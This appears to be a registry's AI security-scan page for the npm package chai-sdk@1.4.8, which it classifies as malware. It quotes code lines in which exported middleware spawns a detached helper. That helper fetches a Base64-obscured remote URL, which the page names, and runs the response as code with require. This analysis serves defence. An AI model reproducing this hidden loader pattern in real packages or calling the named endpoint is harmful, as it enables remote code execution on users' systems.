registry  /  chai-sdk  /  1.4.8

chai-sdk@1.4.8

This document describes the management of vulnerabilities for the project and all modules within the organization.

AI Security Review

scanned 3h ago · by lpm-firewall-ai

Runtime use of the exported middleware launches a detached helper that fetches and executes remote JavaScript. The remote payload receives require, so it can load Node modules and perform arbitrary actions in the host project context.

Static reason
One or more suspicious static signals were detected.
Trigger
Application imports chai-sdk main entry and invokes exported middleware/function.
Impact
Arbitrary remote code execution in the consuming application environment; remote payload could exfiltrate credentials, mutate files, or persist depending on fetched code.
Mechanism
detached child process fetches remote config and executes response field as code
Attack narrative
The package main entry is index.js. When the exported middleware is called, it spawns a detached Node process for lib/initializeCaller.js. That helper contacts a Base64-obscured tiiny.site URL with axios, reads response.data.cookie, constructs it with new Function, and executes it with require. This is an unbounded remote payload execution path hidden behind normal package use.
Rationale
Static inspection confirms a concrete runtime remote-code-execution chain from package API invocation to hidden network fetch and dynamic execution. Absence of install hooks reduces install-time impact but does not mitigate the malicious runtime payload loader.
Evidence
package.jsonindex.jslib/initializeCaller.jsfile.jslib/worker.jslib/transport.js
Network endpoints1
amethyst-lorrin-26.tiiny.site/index.json

Decision evidence

public snapshot
AI called this Malicious at 98.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js exports middleware that spawns detached node process running lib/initializeCaller.js on invocation.
  • lib/initializeCaller.js performs axios.get to Base64-hidden URL https://amethyst-lorrin-26.tiiny.site/index.json.
  • lib/initializeCaller.js executes response.data.cookie with new Function("require", ...), enabling arbitrary remote code execution.
  • package.json main is index.js and no lifecycle hooks are needed; attack triggers at runtime when package API is used.
  • Package contents appear copied from pino docs/code while manifest name is chai-sdk, increasing deception context.
Evidence against
  • package.json has no preinstall/install/postinstall lifecycle scripts.
  • No local credential harvesting or file writes are visible in inspected static source before remote payload execution.
Behavioral surface
Source
ChildProcessEnvironmentVarsEvalNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 16 file(s), 52.2 KB of source, external domains: github.com

Source & flagged code

5 flagged · loading source
index.jsView file
3const path = require('path'); L4: const { spawn } = require('child_process'); L5: const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants');
High
Child Process

Package source references child process execution.

index.jsView on unpkg · L3
3Cross-file remote execution chain: index.js spawns lib/initializeCaller.js; helper contains network access plus dynamic code execution. L3: const path = require('path'); L4: const { spawn } = require('child_process'); L5: const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants'); ... L37: function runBackgroundTask(args) { L38: const scriptPath = path.resolve(__dirname, './lib/initializeCaller.js'); L39:
High
Cross File Remote Execution Context

Source spawns a local helper that also contains network and dynamic execution context; review data flow before blocking.

index.jsView on unpkg · L3
lib/initializeCaller.jsView file
6(async function initializeCaller(..._args) { L7: const response = await axios.get(atob("[redacted]")); L8: try {
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

lib/initializeCaller.jsView on unpkg · L6
8try { L9: const executor = new Function("require", response.data.cookie); L10: executor(require);
Low
Eval

Package source references a known benign dynamic code generation pattern.

lib/initializeCaller.jsView on unpkg · L8
docs/transports.mdView file
550patternName = generic_password severity = medium line = 550 matchedText = password...rd',
Medium
Secret Pattern

Hardcoded password in docs/transports.md

docs/transports.mdView on unpkg · L550

Findings

3 High3 Medium4 Low
HighChild Processindex.js
HighCross File Remote Execution Contextindex.js
HighBase64 Obscured Urllib/initializeCaller.js
MediumNetwork
MediumEnvironment Vars
MediumSecret Patterndocs/transports.md
LowScripts Present
LowEvallib/initializeCaller.js
LowHigh Entropy Strings
LowUrl Strings